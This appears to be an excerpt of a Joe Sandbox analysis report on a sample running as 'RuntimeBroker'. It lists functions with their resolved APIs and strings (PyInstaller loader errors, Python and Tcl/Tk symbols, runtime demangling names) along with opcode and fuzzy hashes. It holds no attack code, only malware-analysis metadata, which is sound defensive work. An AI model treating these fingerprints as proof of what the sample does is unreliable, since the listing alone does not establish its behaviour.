API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction ID: bbcbc5e145e4a8db3abb822320ad60a974f88cd161742ec1b03db7f1d512ae5e
Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction Fuzzy Hash: 15514B22E1864286E732EF2AEC815BDE760FB49784FC44135EA4D436A6DF3CE541DB60

Function 00007FF72B0550B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0550C0
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055101
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055126
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05514B
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055173
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05519B
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551C3
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551EB
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055213

Strings

PyPreConfig_InitIsolatedConfig, xrefs: 00007FF72B0555C9, 00007FF72B0555E5
PyObject_CallFunctionObjArgs, xrefs: 00007FF72B055529, 00007FF72B055545
PyConfig_SetString, xrefs: 00007FF72B055281, 00007FF72B05529D
PyUnicode_FromFormat, xrefs: 00007FF72B055709, 00007FF72B055725
PyImport_AddModule, xrefs: 00007FF72B0553E9, 00007FF72B055405
PyErr_Fetch, xrefs: 00007FF72B0552F9, 00007FF72B055315
PyList_Append, xrefs: 00007FF72B055461, 00007FF72B05547D
Py_Finalize, xrefs: 00007FF72B055141, 00007FF72B05515D
PyStatus_Exception, xrefs: 00007FF72B055619, 00007FF72B055635
PyObject_CallFunction, xrefs: 00007FF72B055501, 00007FF72B05551D
Py_InitializeFromConfig, xrefs: 00007FF72B055169, 00007FF72B055185
PyImport_ImportModule, xrefs: 00007FF72B055439, 00007FF72B055455
PyConfig_SetWideStringList, xrefs: 00007FF72B0552A9, 00007FF72B0552C5
Py_ExitStatusException, xrefs: 00007FF72B05511C, 00007FF72B055138
PyRun_SimpleStringFlags, xrefs: 00007FF72B0555F1, 00007FF72B05560D
Py_IsInitialized, xrefs: 00007FF72B055191, 00007FF72B0551AD
PyUnicode_Replace, xrefs: 00007FF72B055781, 00007FF72B05579D
PyUnicode_AsUTF8, xrefs: 00007FF72B055691, 00007FF72B0556AD
Py_DecRef, xrefs: 00007FF72B0550B6, 00007FF72B0550D2
PyMem_RawFree, xrefs: 00007FF72B0554B1, 00007FF72B0554CD
Py_DecodeLocale, xrefs: 00007FF72B0550F7, 00007FF72B055113
Failed to get address for %hs, xrefs: 00007FF72B0550D9
PyConfig_Clear, xrefs: 00007FF72B0551E1, 00007FF72B0551FD
PyConfig_SetBytesString, xrefs: 00007FF72B055259, 00007FF72B055275
GetProcAddress, xrefs: 00007FF72B0550E0
PyObject_SetAttrString, xrefs: 00007FF72B055579, 00007FF72B055595
Py_PreInitialize, xrefs: 00007FF72B0551B9, 00007FF72B0551D5
PyUnicode_DecodeFSDefault, xrefs: 00007FF72B0556E1, 00007FF72B0556FD
PyUnicode_Decode, xrefs: 00007FF72B0556B9, 00007FF72B0556D5
PyObject_GetAttrString, xrefs: 00007FF72B055551, 00007FF72B05556D
PyErr_NormalizeException, xrefs: 00007FF72B055321, 00007FF72B05533D
PyErr_Restore, xrefs: 00007FF72B055399, 00007FF72B0553B5
PySys_GetObject, xrefs: 00007FF72B055641, 00007FF72B05565D
PyConfig_InitIsolatedConfig, xrefs: 00007FF72B055209, 00007FF72B055225
PyModule_GetDict, xrefs: 00007FF72B0554D9, 00007FF72B0554F5
PyImport_ExecCodeModule, xrefs: 00007FF72B055411, 00007FF72B05542D
PyErr_Clear, xrefs: 00007FF72B0552D1, 00007FF72B0552ED
PyConfig_Read, xrefs: 00007FF72B055231, 00007FF72B05524D
PyUnicode_FromString, xrefs: 00007FF72B055731, 00007FF72B05574D
PySys_SetObject, xrefs: 00007FF72B055669, 00007FF72B055685
PyErr_Occurred, xrefs: 00007FF72B055349, 00007FF72B055365
PyErr_Print, xrefs: 00007FF72B055371, 00007FF72B05538D
PyMarshal_ReadObjectFromString, xrefs: 00007FF72B055489, 00007FF72B0554A5
PyUnicode_Join, xrefs: 00007FF72B055759, 00007FF72B055775
PyObject_Str, xrefs: 00007FF72B0555A1, 00007FF72B0555BD
PyEval_EvalCode, xrefs: 00007FF72B0553C1, 00007FF72B0553DD

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 66a1498f64d863b07e96b0759cf09460149afc660524153ff3ede2eb42c74d45
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 7B124764A0AB4391FA77FB5CACA42B8E3A0FF04751BD45435C41E126B1EF7CE548AB60

Function 00007FF72B056EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF72B056EB7
GetProcAddress.KERNEL32 ref: 00007FF72B056EFD
GetProcAddress.KERNEL32 ref: 00007FF72B056F22
GetProcAddress.KERNEL32 ref: 00007FF72B056F47
GetProcAddress.KERNEL32 ref: 00007FF72B056F6F
GetProcAddress.KERNEL32 ref: 00007FF72B056F97
GetProcAddress.KERNEL32 ref: 00007FF72B056FBF
GetProcAddress.KERNEL32 ref: 00007FF72B056FE7
GetProcAddress.KERNEL32 ref: 00007FF72B05700F

Strings

Tcl_CreateInterp, xrefs: 00007FF72B056EF3, 00007FF72B056F0F
Tcl_DoOneEvent, xrefs: 00007FF72B056F3D, 00007FF72B056F59
Tcl_DeleteInterp, xrefs: 00007FF72B056FB5, 00007FF72B056FD1
Tcl_Free, xrefs: 00007FF72B057375, 00007FF72B057391
Tcl_GetVar2, xrefs: 00007FF72B057195, 00007FF72B0571B1
Tcl_GetCurrentThread, xrefs: 00007FF72B057005, 00007FF72B057021
Tcl_ConditionWait, xrefs: 00007FF72B05711D, 00007FF72B057139
Tcl_CreateThread, xrefs: 00007FF72B056FDD, 00007FF72B056FF9
Tcl_NewByteArrayObj, xrefs: 00007FF72B05725D, 00007FF72B057279
Tk_Init, xrefs: 00007FF72B05739D, 00007FF72B0573B9
Tcl_MutexLock, xrefs: 00007FF72B057055, 00007FF72B057071
Tcl_SetVar2, xrefs: 00007FF72B0571BD, 00007FF72B0571D9
Tcl_JoinThread, xrefs: 00007FF72B05702D, 00007FF72B057049
Tcl_MutexFinalize, xrefs: 00007FF72B0570A5, 00007FF72B0570C1
Tk_GetNumMainWindows, xrefs: 00007FF72B0573C5, 00007FF72B0573E1
Tcl_ConditionFinalize, xrefs: 00007FF72B0570CD, 00007FF72B0570E9
Tcl_EvalFile, xrefs: 00007FF72B0572D5, 00007FF72B0572F1
Tcl_EvalEx, xrefs: 00007FF72B0572FD, 00007FF72B057319
Tcl_EvalObjv, xrefs: 00007FF72B057325, 00007FF72B057341
Tcl_ThreadAlert, xrefs: 00007FF72B05716D, 00007FF72B057189
Tcl_Finalize, xrefs: 00007FF72B056F65, 00007FF72B056F81
Tcl_CreateObjCommand, xrefs: 00007FF72B0571E5, 00007FF72B057201
Failed to get address for %hs, xrefs: 00007FF72B056ED0
Tcl_GetObjResult, xrefs: 00007FF72B0572AD, 00007FF72B0572C9
GetProcAddress, xrefs: 00007FF72B056ED7
Tcl_ConditionNotify, xrefs: 00007FF72B0570F5, 00007FF72B057111
Tcl_FinalizeThread, xrefs: 00007FF72B056F8D, 00007FF72B056FA9
Tcl_ThreadQueueEvent, xrefs: 00007FF72B057145, 00007FF72B057161
Tcl_FindExecutable, xrefs: 00007FF72B056F18, 00007FF72B056F34
Tcl_GetString, xrefs: 00007FF72B05720D, 00007FF72B057229
Tcl_SetVar2Ex, xrefs: 00007FF72B057285, 00007FF72B0572A1
Tcl_Init, xrefs: 00007FF72B056EB0, 00007FF72B056EC9
Tcl_MutexUnlock, xrefs: 00007FF72B05707D, 00007FF72B057099
Tcl_NewStringObj, xrefs: 00007FF72B057235, 00007FF72B057251
Tcl_Alloc, xrefs: 00007FF72B05734D, 00007FF72B057369

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: efbe7913ad2460dc7cbf451e4ce74f8dff6f659b493cfbaebe158866d6030a7e
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: D6E195A4A1AB43A0EA77BB5CAC941B4E3A5FF04750FC45135C80E126B4EF3CF549AB60

Function 00007FFE0C0B8C24 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 352COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B913D
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9175
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B91AF

Strings

__int32, xrefs: 00007FFE0C0B8EDB
char32_t, xrefs: 00007FFE0C0B90B7
decltype(auto), xrefs: 00007FFE0C0B90C6
char16_t, xrefs: 00007FFE0C0B9065
long , xrefs: 00007FFE0C0B8D31
__int128, xrefs: 00007FFE0C0B8EB7
volatile, xrefs: 00007FFE0C0B9025
short, xrefs: 00007FFE0C0B8CE0
long, xrefs: 00007FFE0C0B8CBC
__w64 , xrefs: 00007FFE0C0B8E3A
bool, xrefs: 00007FFE0C0B9056
char8_t, xrefs: 00007FFE0C0B8F2D
double, xrefs: 00007FFE0C0B8D48
void, xrefs: 00007FFE0C0B8D86
auto, xrefs: 00007FFE0C0B8F3F
<unknown>, xrefs: 00007FFE0C0B8F1B
volatile, xrefs: 00007FFE0C0B8FF8
int, xrefs: 00007FFE0C0B8CCE
__int16, xrefs: 00007FFE0C0B8E1C
unsigned , xrefs: 00007FFE0C0B90FA
__int64, xrefs: 00007FFE0C0B8EC9
UNKNOWN, xrefs: 00007FFE0C0B908D
float, xrefs: 00007FFE0C0B8D74
__int8, xrefs: 00007FFE0C0B8E2E
const, xrefs: 00007FFE0C0B8FDD
wchar_t, xrefs: 00007FFE0C0B90A8
signed , xrefs: 00007FFE0C0B910A
char, xrefs: 00007FFE0C0B8CF2

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction ID: 6808d37e393d3782a196cf300d5e946716cefd6f7f0c628a8cb40257fcd6c5ec
Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction Fuzzy Hash: 0DF13B72E9861298FB14CB6CC8A42BC27B6FF15744F408635DB1D16AB8DF7DA644C348

Function 00007FFE0C0BC3C8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC459
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC492
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC566
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC577
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC5DA
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC5EA
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC636
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC648
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC7BB
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC83B
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC84A

Strings

`anonymous namespace', xrefs: 00007FFE0C0BC71B

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction ID: 3aef878cba2104739387566e83fd2e8f6cdec488269b1be3756f16fed6d805a3
Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction Fuzzy Hash: 03E16A72A48B8699EB20CF28E8901ED77A2FF84744F444036EB5D17B65DF38E654C704

Function 00007FF72B0515C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON

Download Yara Rule

Strings

Failed to create symbolic link %s!, xrefs: 00007FF72B0515E2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B051785
fwrite, xrefs: 00007FF72B05177C
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF72B0516EF
malloc, xrefs: 00007FF72B0516F6
Failed to extract %s: failed to open target file!, xrefs: 00007FF72B051617
fopen, xrefs: 00007FF72B05161E
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B05165B
fread, xrefs: 00007FF72B05178C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B05168E
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF72B051775
fseek, xrefs: 00007FF72B051695

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 569009f7f297507fd8546658437f9c7fcb1a93c1adb78ffbe4a696c73ee9108c
Instruction ID: ad2a28cdf61541087b99246025801a567a93735240030d93452f4a7a7366fe91
Opcode Fuzzy Hash: 569009f7f297507fd8546658437f9c7fcb1a93c1adb78ffbe4a696c73ee9108c
Instruction Fuzzy Hash: 5E518E61B0864691EA32BB1D9D901B9E3A0FF44B94FC48131DE1D47AB5EF3CE994DB20

Function 00007FF72B0577D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B057C97,?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B05782C

Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736

Strings

\, xrefs: 00007FF72B057861
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF72B0578D9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF72B05796D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF72B057803
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF72B05789D
CreateDirectory, xrefs: 00007FF72B057974
%.*s, xrefs: 00007FF72B05790C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF72B057840

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: c8da6068e1258ae80fbd9bff6dbba274081ee91406ed979adb3213b7776bcad5
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: 10417061B2864281FA72BB2CDC916FAE251FF84784FC44435DA4E42AB5EE2CF5049F70

Function 00007FFE0C0BA83C Relevance: 22.9, APIs: 15, Instructions: 358COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA88D
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA969
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA9B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA9C3

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction ID: 7fd79ae93ea56db053e8956bc8f6437ff82328c26369c626232740f24a501fcc
Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction Fuzzy Hash: 6DF16C72B48A829AEB10DF68D4A01EC37B2EF4474CB444036EB4D67BA9DF38D519D358

Function 00007FFE0C0BD20C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 349COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BD712

Strings

nullptr, xrefs: 00007FFE0C0BD3FA
NULL, xrefs: 00007FFE0C0BD2D7
`template-type-parameter-, xrefs: 00007FFE0C0BD6D0
`generic-class-parameter-, xrefs: 00007FFE0C0BD6C7
`generic-method-parameter-, xrefs: 00007FFE0C0BD6B7

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
API String ID: 2943138195-2309034085
Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction ID: 75f951bc9a18639167acf41d4933011167a3d54bf889aaaf8c70db6af05b3c30
Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction Fuzzy Hash: 8AE16C62E8C71295FB24DB6CC9B41FCA7A6AF45744F440136DB0E26AB9DF3CA904C358

Function 00007FFE0C0B2CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE0C0B2D40

Part of subcall function 00007FFE0C0B5010: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE0C0B5045
Part of subcall function 00007FFE0C0B5010: __GetUnwindTryBlock.LIBCMT ref: 00007FFE0C0B5053
Part of subcall function 00007FFE0C0B5010: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE0C0B5078

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE0C0B2E18
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B2E25
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE0C0B3060
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B308E
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE0C0B30CC

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B3154
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE0C0B3189

Strings

csm, xrefs: 00007FFE0C0B2D5A
csm, xrefs: 00007FFE0C0B2DC1
csm, xrefs: 00007FFE0C0B2E3D

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3436797354-393685449
Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction ID: 7dfc5758ca576bf1d0fed68bfae7b545af7184933cac089d0ac8c2fb7959f44c
Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction Fuzzy Hash: 30D1A372A48B428AEB20DF69D4A12AD77A6FF45B98F100135EF8D57B65CF38E190C704

Function 00007FF72B0520F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

